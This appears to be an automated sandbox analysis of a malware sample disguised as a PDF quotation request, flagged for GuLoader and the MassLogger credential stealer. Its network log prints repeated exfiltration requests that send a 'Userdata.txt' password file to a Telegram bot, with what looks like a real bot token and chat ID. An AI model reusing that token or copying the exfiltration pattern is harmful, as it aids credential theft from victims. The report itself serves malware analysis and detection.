                                                                                                                                2024-12-16 07:45:17 UTC | 272 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1ebb7bf07885
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:45:17 UTC | 1090 | OUT | Data Ascii: --===============8dd1ebb7bf07885Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:18 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:18 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 542
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:18 UTC | 542 | IN | Data Ascii: {"ok":true,"result":{"message_id":12254,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335118,"document":{"file_n


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                8 | 192.168.2.5 | 49913 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-16 07:45:21 UTC | 272 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1ee4c9083d38
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:45:21 UTC | 1090 | OUT | Data Ascii: --===============8dd1ee4c9083d38Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:21 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:21 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 544
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:21 UTC | 544 | IN | Data Ascii: {"ok":true,"result":{"message_id":12255,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335121,"document":{"file_n


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                9 | 192.168.2.5 | 49924 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-16 07:45:24 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1f0f291b1e8e
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 30 66 32 39 31 62 31 65 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1f0f291b1e8eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:25 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:25 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:25 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12256,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335125,"document":{"file_n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49932 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:45:28 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd1f3a96920953
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2024-12-16 07:45:28 UTC | 1090 | OUT | Data Ascii: --===============8dd1f3a96920953Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 07:45:28 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 07:45:28 GMT
Content-Type: application/json
Content-Length: 543
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 07:45:28 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12257,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335128,"document":{"file_n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49943 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:45:31 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd1f6860597c58
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2024-12-16 07:45:31 UTC | 1090 | OUT | Data Ascii: --===============8dd1f6860597c58Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 07:45:31 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 07:45:31 GMT
Content-Type: application/json
Content-Length: 543
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 07:45:31 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12258,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335131,"document":{"file_n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:45:35 UTC | 272 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd1fa6c0cb5abe
Host: api.telegram.org
Content-Length: 1090
2024-12-16 07:45:35 UTC | 1090 | OUT | Data Ascii: --===============8dd1fa6c0cb5abeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 07:45:36 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 07:45:36 GMT
Content-Type: application/json
Content-Length: 543
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 07:45:36 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12259,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335136,"document":{"file_n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49963 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:45:38 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd1fe3675fc152
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2024-12-16 07:45:38 UTC | 1090 | OUT | Data Ascii: --===============8dd1fe3675fc152Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 07:45:39 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 07:45:39 GMT
Content-Type: application/json
Content-Length: 543
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 07:45:39 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12260,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335139,"document":{"file_n


Target ID: 0
Start time: 02:43:33
Start date: 16/12/2024
Path: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
Imagebase: 0x400000
File size: 475'776 bytes
MD5 hash: FD9335D7160883534E42839297A65C7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2521858617.000000000342E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 02:44:22
Start date: 16/12/2024
Path: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
Imagebase: 0x400000
File size: 475'776 bytes
MD5 hash: FD9335D7160883534E42839297A65C7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:21.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                                  Signature Coverage:20.8%
                                                                                                                                  Total number of Nodes:1517
                                                                                                                                  Total number of Limit Nodes:46
3775->3776 3779 40365b 3776->3779 3776->3801 3981 40140b 3777->3981 3780 403660 3779->3780 3781 403667 3779->3781 3946 405683 CreateDirectoryW 3780->3946 3951 405700 CreateDirectoryW 3781->3951 3782->3774 3782->3777 3784 4035d2 3931 406055 lstrcpynW 3784->3931 3859 40389e 3788->3859 3790 40366c SetCurrentDirectoryW 3791 403687 3790->3791 3792 40367c 3790->3792 3955 406055 lstrcpynW 3791->3955 3954 406055 lstrcpynW 3792->3954 3797 4036d3 CopyFileW 3803 403695 3797->3803 3798 40371c 3800 405ef6 38 API calls 3798->3800 3800->3801 3932 4037c4 3801->3932 3802 406077 18 API calls 3802->3803 3803->3798 3803->3802 3805 403707 CloseHandle 3803->3805 3956 406077 3803->3956 3974 405ef6 MoveFileExW 3803->3974 3978 405735 CreateProcessW 3803->3978 3805->3803 3807 4063e1 wsprintfW LoadLibraryW 3806->3807 3807->3720 3810 406451 GetProcAddress 3809->3810 3811 406447 3809->3811 3813 40330c 3810->3813 3812 4063bf 3 API calls 3811->3812 3814 40644d 3812->3814 3813->3727 3814->3810 3814->3813 3815->3730 3816->3732 3818 405a3c 3817->3818 3819 403389 CharNextW 3818->3819 3820 405a43 CharNextW 3818->3820 3819->3736 3819->3741 3820->3818 3984 4062e9 3821->3984 3823 403285 3823->3738 3824 40327b 3824->3823 3993 405a09 lstrlenW CharPrevW 3824->3993 3827 405700 2 API calls 3828 403293 3827->3828 3996 405c59 3828->3996 4000 405c2a GetFileAttributesW CreateFileW 3831->4000 3833 402e2e 3852 402e3e 3833->3852 4001 406055 lstrcpynW 3833->4001 3835 402e54 4002 405a55 lstrlenW 3835->4002 3839 402e65 GetFileSize 3840 402f61 3839->3840 3858 402e7c 3839->3858 4007 402d8a 3840->4007 3842 402f6a 3844 402f9a GlobalAlloc 3842->3844 3842->3852 4042 403258 SetFilePointer 3842->4042 4018 403258 SetFilePointer 3844->4018 3847 402fcd 3849 402d8a 6 API calls 3847->3849 3848 402fb5 4019 403027 3848->4019 3849->3852 3850 402f83 3853 403242 ReadFile 3850->3853 3852->3746 3855 402f8e 3853->3855 3854 402d8a 6 API calls 3854->3858 3855->3844 3855->3852 3856 402fc1 3856->3852 3856->3856 3857 402ffe SetFilePointer 
3856->3857 3857->3852 3858->3840 3858->3847 3858->3852 3858->3854 4039 403242 3858->4039 3860 40642b 5 API calls 3859->3860 3861 4038b2 3860->3861 3862 4038b8 GetUserDefaultUILanguage 3861->3862 3863 4038ca 3861->3863 4063 405f9c wsprintfW 3862->4063 4073 405f22 RegOpenKeyExW 3863->4073 3866 4038c8 4064 403b74 3866->4064 3868 403919 lstrcatW 3868->3866 3869 405f22 3 API calls 3869->3868 3872 405b11 18 API calls 3873 40394b 3872->3873 3874 4039df 3873->3874 3877 405f22 3 API calls 3873->3877 3875 405b11 18 API calls 3874->3875 3876 4039e5 3875->3876 3879 4039f5 LoadImageW 3876->3879 3880 406077 18 API calls 3876->3880 3878 40397d 3877->3878 3878->3874 3883 40399e lstrlenW 3878->3883 3887 405a36 CharNextW 3878->3887 3881 403a9b 3879->3881 3882 403a1c RegisterClassW 3879->3882 3880->3879 3886 40140b 2 API calls 3881->3886 3884 403a52 SystemParametersInfoW CreateWindowExW 3882->3884 3885 403aa5 3882->3885 3888 4039d2 3883->3888 3889 4039ac lstrcmpiW 3883->3889 3884->3881 3885->3801 3890 403aa1 3886->3890 3891 40399b 3887->3891 3893 405a09 3 API calls 3888->3893 3889->3888 3892 4039bc GetFileAttributesW 3889->3892 3890->3885 3895 403b74 19 API calls 3890->3895 3891->3883 3894 4039c8 3892->3894 3896 4039d8 3893->3896 3894->3888 3897 405a55 2 API calls 3894->3897 3898 403ab2 3895->3898 4078 406055 lstrcpynW 3896->4078 3897->3888 3900 403b41 3898->3900 3901 403abe ShowWindow 3898->3901 4079 405287 OleInitialize 3900->4079 3903 4063bf 3 API calls 3901->3903 3904 403ad6 3903->3904 3906 403ae4 GetClassInfoW 3904->3906 3908 4063bf 3 API calls 3904->3908 3905 403b47 3907 403b63 3905->3907 3912 403b4b 3905->3912 3910 403af8 GetClassInfoW RegisterClassW 3906->3910 3911 403b0e DialogBoxParamW 3906->3911 3909 40140b 2 API calls 3907->3909 3908->3906 3909->3885 3910->3911 3913 40140b 2 API calls 3911->3913 3912->3885 3914 40140b 2 API calls 3912->3914 3913->3885 3914->3885 3915->3751 4094 406055 lstrcpynW 3916->4094 3918 405b22 4095 405ab4 CharNextW CharNextW 3918->4095 3921 4035c3 
3921->3801 3930 406055 lstrcpynW 3921->3930 3922 4062e9 5 API calls 3923 405b38 3922->3923 3923->3921 3924 405b69 lstrlenW 3923->3924 3929 405a55 2 API calls 3923->3929 4101 406398 FindFirstFileW 3923->4101 3924->3923 3925 405b74 3924->3925 3926 405a09 3 API calls 3925->3926 3928 405b79 GetFileAttributesW 3926->3928 3928->3921 3929->3924 3930->3784 3931->3788 3933 4037dc 3932->3933 3934 4037ce CloseHandle 3932->3934 4104 403809 3933->4104 3934->3933 3940 4057af 3939->3940 3941 403616 ExitProcess 3940->3941 3942 4057c3 MessageBoxIndirectW 3940->3942 3942->3941 3944 40642b 5 API calls 3943->3944 3945 403623 lstrcatW 3944->3945 3945->3775 3945->3776 3947 403665 3946->3947 3948 4056d4 GetLastError 3946->3948 3947->3790 3948->3947 3949 4056e3 SetFileSecurityW 3948->3949 3949->3947 3950 4056f9 GetLastError 3949->3950 3950->3947 3952 405710 3951->3952 3953 405714 GetLastError 3951->3953 3952->3790 3953->3952 3954->3791 3955->3803 3965 406084 3956->3965 3957 4062cf 3958 4036c6 DeleteFileW 3957->3958 4163 406055 lstrcpynW 3957->4163 3958->3797 3958->3803 3960 406137 GetVersion 3960->3965 3961 40629d lstrlenW 3961->3965 3964 406077 10 API calls 3964->3961 3965->3957 3965->3960 3965->3961 3965->3964 3966 405f22 3 API calls 3965->3966 3967 4061b2 GetSystemDirectoryW 3965->3967 3968 4061c5 GetWindowsDirectoryW 3965->3968 3969 4062e9 5 API calls 3965->3969 3970 4061f9 SHGetSpecialFolderLocation 3965->3970 3971 406077 10 API calls 3965->3971 3972 40623e lstrcatW 3965->3972 4161 405f9c wsprintfW 3965->4161 4162 406055 lstrcpynW 3965->4162 3966->3965 3967->3965 3968->3965 3969->3965 3970->3965 3973 406211 SHGetPathFromIDListW CoTaskMemFree 3970->3973 3971->3965 3972->3965 3973->3965 3975 405f17 3974->3975 3976 405f0a 3974->3976 3975->3803 4164 405d84 lstrcpyW 3976->4164 3979 405774 3978->3979 3980 405768 CloseHandle 3978->3980 3979->3803 3980->3979 3982 401389 2 API calls 3981->3982 3983 401420 3982->3983 3983->3761 3990 4062f6 3984->3990 3985 40636c 3986 406371 CharPrevW 
3985->3986 3988 406392 3985->3988 3986->3985 3987 40635f CharNextW 3987->3985 3987->3990 3988->3824 3989 405a36 CharNextW 3989->3990 3990->3985 3990->3987 3990->3989 3991 40634b CharNextW 3990->3991 3992 40635a CharNextW 3990->3992 3991->3990 3992->3987 3994 40328d 3993->3994 3995 405a25 lstrcatW 3993->3995 3994->3827 3995->3994 3997 405c66 GetTickCount GetTempFileNameW 3996->3997 3998 40329e 3997->3998 3999 405c9c 3997->3999 3998->3738 3999->3997 3999->3998 4000->3833 4001->3835 4003 405a63 4002->4003 4004 402e5a 4003->4004 4005 405a69 CharPrevW 4003->4005 4006 406055 lstrcpynW 4004->4006 4005->4003 4005->4004 4006->3839 4008 402d93 4007->4008 4009 402dab 4007->4009 4010 402da3 4008->4010 4011 402d9c DestroyWindow 4008->4011 4012 402db3 4009->4012 4013 402dbb GetTickCount 4009->4013 4010->3842 4011->4010 4043 406467 4012->4043 4015 402dc9 CreateDialogParamW ShowWindow 4013->4015 4016 402dec 4013->4016 4015->4016 4016->3842 4018->3848 4020 403040 4019->4020 4021 40306e 4020->4021 4049 403258 SetFilePointer 4020->4049 4023 403242 ReadFile 4021->4023 4024 403079 4023->4024 4025 4031db 4024->4025 4026 40308b GetTickCount 4024->4026 4034 4031c5 4024->4034 4027 40321d 4025->4027 4032 4031df 4025->4032 4026->4034 4038 4030da 4026->4038 4028 403242 ReadFile 4027->4028 4028->4034 4029 403242 ReadFile 4029->4038 4030 403242 ReadFile 4030->4032 4031 405cdc WriteFile 4031->4032 4032->4030 4032->4031 4032->4034 4033 403130 GetTickCount 4033->4038 4034->3856 4035 403155 MulDiv wsprintfW 4050 4051b4 4035->4050 4038->4029 4038->4033 4038->4034 4038->4035 4047 405cdc WriteFile 4038->4047 4061 405cad ReadFile 4039->4061 4042->3850 4044 406484 PeekMessageW 4043->4044 4045 402db9 4044->4045 4046 40647a DispatchMessageW 4044->4046 4045->3842 4046->4044 4048 405cfa 4047->4048 4048->4038 4049->4021 4051 405271 4050->4051 4052 4051cf 4050->4052 4051->4038 4053 4051eb lstrlenW 4052->4053 4054 406077 18 API calls 4052->4054 4055 405214 4053->4055 4056 4051f9 lstrlenW 4053->4056 4054->4053 
4058 405227 4055->4058 4059 40521a SetWindowTextW 4055->4059 4056->4051 4057 40520b lstrcatW 4056->4057 4057->4055 4058->4051 4060 40522d SendMessageW SendMessageW SendMessageW 4058->4060 4059->4058 4060->4051 4062 403255 4061->4062 4062->3858 4063->3866 4065 403b88 4064->4065 4086 405f9c wsprintfW 4065->4086 4067 403bf9 4068 406077 18 API calls 4067->4068 4069 403c05 SetWindowTextW 4068->4069 4070 403c21 4069->4070 4071 403929 4069->4071 4070->4071 4072 406077 18 API calls 4070->4072 4071->3872 4072->4070 4074 4038fa 4073->4074 4075 405f56 RegQueryValueExW 4073->4075 4074->3868 4074->3869 4076 405f77 RegCloseKey 4075->4076 4076->4074 4078->3874 4087 404165 4079->4087 4081 4052aa 4085 4052d1 4081->4085 4090 401389 4081->4090 4082 404165 SendMessageW 4083 4052e3 OleUninitialize 4082->4083 4083->3905 4085->4082 4086->4067 4088 40417d 4087->4088 4089 40416e SendMessageW 4087->4089 4088->4081 4089->4088 4092 401390 4090->4092 4091 4013fe 4091->4081 4092->4091 4093 4013cb MulDiv SendMessageW 4092->4093 4093->4092 4094->3918 4096 405ad1 4095->4096 4097 405ae3 4095->4097 4096->4097 4098 405ade CharNextW 4096->4098 4099 405a36 CharNextW 4097->4099 4100 405b07 4097->4100 4098->4100 4099->4097 4100->3921 4100->3922 4102 4063b9 4101->4102 4103 4063ae FindClose 4101->4103 4102->3923 4103->4102 4105 403817 4104->4105 4106 4037e1 4105->4106 4107 40381c FreeLibrary GlobalFree 4105->4107 4108 405846 4106->4108 4107->4106 4107->4107 4109 405b11 18 API calls 4108->4109 4110 405866 4109->4110 4111 405885 4110->4111 4112 40586e DeleteFileW 4110->4112 4114 4059b0 4111->4114 4148 406055 lstrcpynW 4111->4148 4113 4035f6 OleUninitialize 4112->4113 4113->3757 4113->3758 4114->4113 4119 406398 2 API calls 4114->4119 4116 4058ab 4117 4058b1 lstrcatW 4116->4117 4118 4058be 4116->4118 4120 4058c4 4117->4120 4121 405a55 2 API calls 4118->4121 4124 4059ca 4119->4124 4122 4058d4 lstrcatW 4120->4122 4123 4058ca 4120->4123 4121->4120 4125 4058df lstrlenW FindFirstFileW 4122->4125 4123->4122 
4123->4125 4124->4113 4126 4059ce 4124->4126 4127 405901 4125->4127 4128 4059a5 4125->4128 4129 405a09 3 API calls 4126->4129 4131 405988 FindNextFileW 4127->4131 4141 405846 62 API calls 4127->4141 4143 4051b4 25 API calls 4127->4143 4145 4051b4 25 API calls 4127->4145 4147 405ef6 38 API calls 4127->4147 4149 406055 lstrcpynW 4127->4149 4150 4057fe 4127->4150 4128->4114 4130 4059d4 4129->4130 4132 4057fe 5 API calls 4130->4132 4131->4127 4135 40599e FindClose 4131->4135 4134 4059e0 4132->4134 4136 4059e4 4134->4136 4137 4059fa 4134->4137 4135->4128 4136->4113 4140 4051b4 25 API calls 4136->4140 4138 4051b4 25 API calls 4137->4138 4138->4113 4142 4059f1 4140->4142 4141->4127 4144 405ef6 38 API calls 4142->4144 4143->4131 4146 4059f8 4144->4146 4145->4127 4146->4113 4147->4127 4148->4116 4149->4127 4158 405c05 GetFileAttributesW 4150->4158 4153 405821 DeleteFileW 4156 405827 4153->4156 4154 405819 RemoveDirectoryW 4154->4156 4155 40582b 4155->4127 4156->4155 4157 405837 SetFileAttributesW 4156->4157 4157->4155 4159 40580a 4158->4159 4160 405c17 SetFileAttributesW 4158->4160 4159->4153 4159->4154 4159->4155 4160->4159 4161->3965 4162->3965 4163->3958 4165 405dd2 GetShortPathNameW 4164->4165 4166 405dac 4164->4166 4168 405ef1 4165->4168 4169 405de7 4165->4169 4191 405c2a GetFileAttributesW CreateFileW 4166->4191 4168->3975 4169->4168 4171 405def wsprintfA 4169->4171 4170 405db6 CloseHandle GetShortPathNameW 4170->4168 4172 405dca 4170->4172 4173 406077 18 API calls 4171->4173 4172->4165 4172->4168 4174 405e17 4173->4174 4192 405c2a GetFileAttributesW CreateFileW 4174->4192 4176 405e24 4176->4168 4177 405e33 GetFileSize GlobalAlloc 4176->4177 4178 405e55 4177->4178 4179 405eea CloseHandle 4177->4179 4180 405cad ReadFile 4178->4180 4179->4168 4181 405e5d 4180->4181 4181->4179 4193 405b8f lstrlenA 4181->4193 4184 405e74 lstrcpyA 4187 405e96 4184->4187 4185 405e88 4186 405b8f 4 API calls 4185->4186 4186->4187 4188 405ecd SetFilePointer 4187->4188 4189 405cdc WriteFile 
